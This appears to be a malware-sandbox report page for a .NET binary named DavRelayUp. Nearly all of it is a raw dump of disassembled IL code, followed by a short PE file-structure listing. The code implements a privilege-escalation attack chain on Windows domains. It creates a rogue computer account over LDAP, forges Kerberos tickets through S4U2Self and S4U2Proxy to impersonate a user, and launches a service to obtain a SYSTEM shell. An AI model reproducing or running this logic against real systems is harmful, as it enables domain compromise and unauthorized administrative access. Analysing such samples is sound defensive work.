System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.3 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_ProtocolVersion(System.Int32) ldloc.0 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_SecureSocketLayer(System.Boolean) br.s IL_00FF: ldloc.0 ldloc.0 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_Sealing(System.Boolean) ldloc.0 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_Signing(System.Boolean) ldloc.0 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapConnection::Bind() ldsfld DavRelayUp.Options/RelayAttackType DavRelayUp.Options::relayAttackType ldc.i4.1 <null> bne.un IL_0304: call System.Threading.Tasks.Task DavRelayUp.Program::RelayTask() ldsfld System.Boolean DavRelayUp.Options::rbcdCreateNewComputerAccount brfalse IL_02EF: ldloc.0 ldsfld System.String DavRelayUp.Options::rbcdComputerPassword call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_0132: newobj System.Void System.DirectoryServices.Protocols.AddRequest::.ctor() ldc.i4.s 16 call System.String DavRelayUp.Relay.Helpers::RandomPasswordGenerator(System.Int32) stsfld System.String DavRelayUp.Options::rbcdComputerPassword newobj System.Void System.DirectoryServices.Protocols.AddRequest::.ctor() stloc.1 <null> ldloc.1 <null> ldstr CN= ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr ,CN=Computers, ldsfld System.String DavRelayUp.Options::domainDN call System.String System.String::Concat(System.String,System.String,System.String,System.String) callvirt System.Void System.DirectoryServices.Protocols.AddRequest::set_DistinguishedName(System.String) ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr objectClass ldstr Computer newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr SamAccountName ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr $ call System.String System.String::Concat(System.String,System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr userAccountControl ldstr 4096 newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr DnsHostName ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String DavRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr ServicePrincipalName ldc.i4.4 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldstr HOST/ ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String DavRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr RestrictedKrbHost/ ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String DavRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr HOST/ ldsfld System.String DavRelayUp.Options::rbcdComputerName call System.String System.String::Concat(System.String,System.String) stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr RestrictedKrbHost/ ldsfld System.String DavRelayUp.Options::rbcdComputerName call System.String System.String::Concat(System.String,System.String) stelem.ref <null> newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.Object[]) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr unicodePwd call System.Text.Encoding System.Text.Encoding::get_Unicode() ldstr " ldsfld System.String DavRelayUp.Options::rbcdComputerPassword ldstr " call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.Byte[]) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.0 <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryResponse System.DirectoryServices.Protocols.DirectoryConnection::SendRequest(System.DirectoryServices.Protocols.DirectoryRequest) pop <null> ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] Computer account " stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $" added with password " stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerPassword stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) leave.s IL_02EF: ldloc.0 stloc.2 <null> ldstr [-] Could not add new computer account: call System.Void System.Console::WriteLine(System.String) ldstr [-] ldloc.2 <null> callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) leave IL_07DD: ret ldloc.0 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName ldsfld System.String DavRelayUp.Options::domainDN call System.String DavRelayUp.Program::GetObjectSidForComputerName(System.DirectoryServices.Protocols.LdapConnection,System.String,System.String) stsfld System.String DavRelayUp.Options::rbcdComputerSid call System.Threading.Tasks.Task DavRelayUp.Program::RelayTask() callvirt System.Void System.Threading.Tasks.Task::Wait() ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.2 <null> beq.s IL_032B: ldnull ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> bne.un IL_07DD: ret ldsfld System.Boolean DavRelayUp.Options::attackDone brfalse IL_07DD: ret ldnull <null> stloc.3 <null> ldsfld DavRelayUp.Options/RelayAttackType DavRelayUp.Options::relayAttackType ldc.i4.1 <null> bne.un IL_0568: ldsfld DavRelayUp.Options/RelayAttackType DavRelayUp.Options::relayAttackType ldc.i4.0 <null> stloc.s V_4 ldnull <null> stloc.s V_5 ldsfld System.String DavRelayUp.Options::rbcdComputerPassword call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_03A9: ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldsfld System.String DavRelayUp.Options::domain callvirt System.String System.String::ToUpper() stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr host stelem.ref <null> dup <null> ldc.i4.2 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName callvirt System.String System.String::ToLower() stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr . stelem.ref <null> dup <null> ldc.i4.4 <null> ldsfld System.String DavRelayUp.Options::domain callvirt System.String System.String::ToLower() stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_9 ldc.i4.s 18 ldsfld System.String DavRelayUp.Options::rbcdComputerPassword ldloc.s V_9 ldc.i4 4096 call System.String DavRelayUp.Crypto::KerberosPasswordHash(DavRelayUp.Interop/KERB_ETYPE,System.String,System.String,System.Int32) stloc.s V_5 ldc.i4.s 18 stloc.s V_4 br.s IL_03C0: ldsfld System.String DavRelayUp.Options::rbcdComputerName ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_03C0: ldsfld System.String DavRelayUp.Options::rbcdComputerName ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash stloc.s V_5 ldc.i4.s 23 stloc.s V_4 ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr $ call System.String System.String::Concat(System.String,System.String) ldsfld System.String DavRelayUp.Options::domain ldloc.s V_5 ldloc.s V_4 ldnull <null> ldc.i4.0 <null> ldstr ldloca.s V_10 initobj DavRelayUp.lib.Interop.LUID ldloc.s V_10 ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.0 <null> ldc.i4.1 <null> ldnull <null> call System.Byte[] DavRelayUp.AskTGT::TGT(System.String,System.String,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String,System.Boolean,System.String,DavRelayUp.lib.Interop.LUID,System.Boolean,System.Boolean,System.String,System.Boolean,System.Boolean,System.String) stloc.s V_6 ldloc.s V_6 brtrue.s IL_03FF: ldloc.s V_6 ret <null> ldloc.s V_6 newobj System.Void DavRelayUp.KRB_CRED::.ctor(System.Byte[]) stloc.s V_7 ldsfld System.Boolean DavRelayUp.Options::verbose brfalse.s IL_044E: ldloc.s V_7 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGT for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $: stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_7 callvirt System.Byte[] DavRelayUp.KRB_CRED::get_RawBytes() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_7 ldsfld System.String DavRelayUp.Options::impersonateUser ldsfld System.String DavRelayUp.Options::targetSPN ldnull <null> ldc.i4.0 <null> ldstr ldstr ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.s 65 ldnull <null> call DavRelayUp.KRB_CRED DavRelayUp.S4U::S4U2Self(DavRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,System.String,System.Boolean,System.Boolean,System.Boolean,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String) stloc.s V_8 ldloc.s V_8 brtrue.s IL_047D: ldsfld System.Boolean DavRelayUp.Options::verbose ret <null> ldsfld System.Boolean DavRelayUp.Options::verbose brfalse.s IL_04E9: ldloc.s V_7 ldc.i4.s 9 newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr $@ stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String DavRelayUp.Options::domain stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.7 <null> ldloc.s V_8 callvirt Asn1.AsnElt DavRelayUp.KRB_CRED::Encode() callvirt System.Byte[] Asn1.AsnElt::Encode() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_7 ldsfld System.String DavRelayUp.Options::impersonateUser ldsfld System.String DavRelayUp.Options::targetSPN ldnull <null> ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> ceq <null> ldc.i4.0 <null> ceq <null> ldstr ldloc.s V_8 ldc.i4.0 <null> ldnull <null> call System.Byte[] DavRelayUp.S4U::S4U2Proxy(DavRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,DavRelayUp.KRB_CRED,System.Boolean,System.String) stloc.3 <null> ldsfld System.Boolean DavRelayUp.Options::verbose brfalse IL_071D: ldc.i4 1500 ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::targetSPN stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.5 <null> ldloc.3 <null> call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) br IL_071D: ldc.i4 1500 ldsfld DavRelayUp.Options/RelayAttackType DavRelayUp.Options::relayAttackType ldc.i4.2 <null> bne.un IL_071D: ldc.i4 1500 call System.String System.Environment::get_MachineName() ldstr $ call System.String System.String::Concat(System.String,System.String) ldsfld System.String DavRelayUp.Options::domain ldsfld System.String DavRelayUp.Options::shadowCredCertificate ldsfld System.String DavRelayUp.Options::shadowCredCertificatePassword ldc.i4.s 18 ldnull <null> ldc.i4.0 <null> ldstr ldsfld System.Boolean DavRelayUp.Options::verbose stloc.s V_14 ldloca.s V_10 initobj DavRelayUp.lib.Interop.LUID ldloc.s V_10 ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldloc.s V_14 ldnull <null> call System.Byte[] DavRelayUp.AskTGT::TGT(System.String,System.String,System.String,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String,System.Boolean,System.String,DavRelayUp.lib.Interop.LUID,System.Boolean,System.Boolean,System.String,System.Boolean,System.String) stloc.s V_11 ldloc.s V_11 brtrue.s IL_05C1: ldloc.s V_11 ret <null> ldloc.s V_11 newobj System.Void DavRelayUp.KRB_CRED::.ctor(System.Byte[]) stloc.s V_12 ldsfld System.Boolean DavRelayUp.Options::verbose brfalse.s IL_0610: ldloc.s V_12 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGT for stelem.ref <null> dup <null> ldc.i4.1 <null> call System.String System.Environment::get_MachineName() stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $: stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_12 callvirt System.Byte[] DavRelayUp.KRB_CRED::get_RawBytes() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_12 ldsfld System.String DavRelayUp.Options::impersonateUser ldsfld System.String DavRelayUp.Options::targetSPN ldnull <null> ldc.i4.0 <null> ldstr ldstr ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.s 65 ldnull <null> call DavRelayUp.KRB_CRED DavRelayUp.S4U::S4U2Self(DavRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,System.String,System.Boolean,System.Boolean,System.Boolean,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String) stloc.s V_13 ldloc.s V_13 brtrue.s IL_063F: ldsfld System.Boolean DavRelayUp.Options::verbose ret <null> ldsfld System.Boolean DavRelayUp.Options::verbose brfalse.s IL_06AB: ldloc.s V_13 ldc.i4.s 9 newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr $@ stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String DavRelayUp.Options::domain stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.7 <null> ldloc.s V_13 callvirt Asn1.AsnElt DavRelayUp.KRB_CRED::Encode() callvirt System.Byte[] Asn1.AsnElt::Encode() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_13 ldsfld System.String DavRelayUp.Options::targetSPN ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> ceq <null> ldc.i4.0 <null> ceq <null> ldloca.s V_10 initobj DavRelayUp.lib.Interop.LUID ldloc.s V_10 call System.Byte[] DavRelayUp.LSA::SubstituteTGSSname(DavRelayUp.KRB_CRED,System.String,System.Boolean,DavRelayUp.lib.Interop.LUID) stloc.3 <null> ldsfld System.Boolean DavRelayUp.Options::verbose brfalse.s IL_071D: ldc.i4 1500 ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::targetSPN stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.5 <null> ldloc.3 <null> call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldc.i4 1500 call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> beq.s IL_0739: call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() ldsfld System.Boolean DavRelayUp.Options::useCreateNetOnly brfalse IL_07D8: call System.Void DavRelayUp.KrbSCM::Run() call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() ldstr krbscm call System.String System.String::Concat(System.String,System.String) stloc.s V_15 ldsfld System.String DavRelayUp.Options::serviceName call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0778: ldsfld System.String DavRelayUp.Options::serviceCommand ldloc.s V_15 ldstr --ServiceName " ldsfld System.String DavRelayUp.Options::serviceName ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_15 ldsfld System.String DavRelayUp.Options::serviceCommand call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_079C: ldsfld System.String DavRelayUp.Options::netOnlyCommand ldloc.s V_15 ldstr --ServiceCommand " ldsfld System.String DavRelayUp.Options::serviceCommand ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_15 ldsfld System.String DavRelayUp.Options::netOnlyCommand brfalse.s IL_07CA: ldloc.s V_15 ldstr [*] --NetOnlyCommand override requested call System.Void System.Console::WriteLine(System.String) ldstr [*] To get the SYSTEM shell, run ' ldloc.s V_15 ldstr ' in context of the created process call System.String System.String::Concat(System.String,System.String,System.String) call System.Void System.Console::WriteLine(System.String) ldsfld System.String DavRelayUp.Options::netOnlyCommand stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldnull <null> ldnull <null> ldnull <null> ldloc.3 <null> call DavRelayUp.lib.Interop.LUID DavRelayUp.Helpers::CreateProcessNetOnly(System.String,System.Boolean,System.String,System.String,System.String,System.Byte[]) pop <null> ret <null> call System.Void DavRelayUp.KrbSCM::Run() ret <null>
3a85d8a51ff724ce38a02d435e0c0bf5 (1.06 MB)
File Structure
3a85d8a51ff724ce38a02d435e0c0bf5
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
DavRelayUp.DSInternals.Common.Properties.Resources.resources
bouncycastle.crypto
system.runtime.windowsruntime
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙